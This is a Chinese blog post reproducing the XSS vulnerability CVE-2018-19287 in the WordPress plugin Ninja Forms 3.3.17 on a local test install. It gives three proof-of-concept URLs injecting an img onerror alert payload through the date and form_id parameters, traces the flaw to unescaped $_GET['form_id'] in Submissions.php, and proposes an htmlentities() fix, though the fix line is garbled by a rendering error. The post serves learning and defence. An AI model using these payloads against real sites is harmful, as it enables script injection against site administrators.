Ninja Forms 3.3.17存在XSS漏洞(CVE-2018-19287)

进行了web攻击及防御的技术总结,内容不是很全,还会进行细节补充。
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
Ninja Forms 3.3.17存在XSS漏洞(CVE-2018-19287)

1.环境:
Win10
phpstudy2016
火狐浏览器
wordpress
Ninja Forms 3.3.17

2.复现
搭建PHPstudy+WordPress
下载并解压WordPress,修改配置文件wp-config.php:
在这里插入图片描述

打开phpmyadmin,新建wp数据库并设置:
在这里插入图片描述

进入http://localhost:8080/wordpress/
会看到wordpress的安装界面,输入相关信息完成安装。
在这里插入图片描述
在这里插入图片描述
进入搭建的网站
在这里插入图片描述

下载Ninja Forms 3.3.17
复制压缩包内的ninja forms目录到wordpress程序的安装目录下的/wp-content/pluginsss目录下
在这里插入图片描述

登录后台开启插件
在这里插入图片描述

POC1: http://localhost:8080/wordpress/wp-admin/edit.php?s&post_status=all&post_type=nf_sub&action=-1&form_id=1&nf_form_filter&begin_date&end_date="><img+src=mtk+οnerrοr=alert(/POC1/);//&filter_action=Filter&paged=1&action2=-1
在这里插入图片描述

POC2:
http://localhost:8080/wordpress/wp-admin/edit.php?s&post_status=all&post_type=nf_sub&action=-1&form_id=1&nf_form_filter&begin_date="><img+src=mtk+οnerrοr=alert(/POC2/);//&end_date&filter_action=Filter&paged=1&action2=-1
在这里插入图片描述
由于
POC3:
http://localhost:8080/wordpress/wp-admin/edit.php?post_status=trash&post_type=nf_sub&form_id=1">&nf_form_filter&paged=1
在这里插入图片描述

3.漏洞分析:
查阅相关资料后得知,POC3成功的原因:
Submissions.php文件存在
$form_id = ‘&form_id=’ . $_GET[ ‘form_id’ ] . ‘&nf_form_filter&paged=1’;
form_id并没有被过滤导致XSS的存在

利用htmlentities()等函数转义html实体
KaTeX parse error: Expected 'EOF', got '&' at position 12: form_id = '&̲form_id=' . htm…_GET[ ‘form_id’ ]) . ‘&nf_form_filter&paged=1’;
修改后,POC3就无法成功了

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值